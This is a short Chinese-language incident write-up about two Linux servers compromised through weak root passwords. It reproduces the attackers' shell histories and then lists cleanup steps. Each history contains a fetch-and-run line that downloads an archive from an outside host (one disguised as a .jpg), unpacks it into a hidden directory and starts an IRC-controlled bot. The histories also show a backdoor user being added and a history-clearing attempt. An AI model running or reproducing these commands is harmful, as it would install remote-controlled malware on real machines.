两台机器由于root密码过于简单而被入侵、种植木马

机器一

[root@localhost ~]# history

1 uname -a

2 fdisk -l

3 mount

4 cat /proc/cpuinfo

5 cat /proc/meminfo

6 top

7 system-config-network

8 cd /etc/ssh/

9 ls

10 vi sshd_config

11 service sshd restart

12 ifconfig -a

13 w

14 ls

15 cd /home/

16 ls

17 adduser ip

18 cd /home/ip/

19 passwd

20 passwd ip

21 passwd root

22 cd /home/ip/

23 wget http://kiss4u.go.ro/smoke.tgz;tar zxvf smoke.tgz;cd .ICE-UNIX ; ./autorun ; ./run

此时有個叫“-sh”的程序会自动启动并且持续运行于系统中。它是一個IRC客户端，根据其控制者在聊天内容中发送的命令来动作。并且在系统的crontab中有一条任务是用来自动启动这個程序的。

要清除的话，需要杀进程、删除crontab条目、删除ip这個用户、删除ip的家目录。

机器二

[root@localhost ~]# history

1 ifconfig -a

2 uname -a

3 vi /etc/ssh/sshd_config

4 service sshd restart

5 cd /home/

6 ls

7 adduser zok

8 histoy -c -n

9 cd /home/zok/

10 wget http://debar.clan.su/exit.jpg ; tar zxvf exit.jpg ; cd .bot : chmod +x * ; ./bash

此时，有一個叫bash的程序会持续运行，同样是一個IRC客户端，接收控制者的指令来进行动作。

要清除的话，需要杀进程、删除zok这個用户、删除zok的家目录。